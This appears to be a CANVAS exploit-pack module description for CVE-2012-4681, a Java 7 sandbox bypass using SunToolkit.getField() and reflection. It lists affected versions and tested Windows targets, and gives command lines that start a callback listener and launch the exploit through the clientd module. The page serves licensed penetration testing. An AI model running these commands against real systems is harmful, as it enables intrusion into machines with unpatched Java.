Immunity, Inc.
Name java_forName_getField
CVE CVE-2012-4681
Exploit Pack CANVAS
Description: Java forName/getField Method Invocation Sandbox Bypass
Notes:
CVE Name: CVE-2012-4681
VENDOR: Sun
Notes:
There is a method invocation vulnerability using sun.awt.SunToolkit.getField().
This vulnerability can then be combined with some reflection tricks to disable the Java Security Manager and escape the sandbox.

Affected versions
JDK and JRE 7 Update 6 and earlier

Note: this does not work under JRE 6 because the getField() function does not work correctly there.

Tested on:
- Windows 7 SP1 with JDK/JRE 7 and 7 update 6
- Windows XP SP3 with JDK/JRE 7 and 7 update 6

Needs more testing (likely to work on other targets)

To run from command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_forName_getField -O allowed_recon_modules:js_recon -O auto_detect_exploits:0


Repeatability: Infinite (client side - no crash)
References: http://pastie.org/4594319
Date public: 07/26/2012
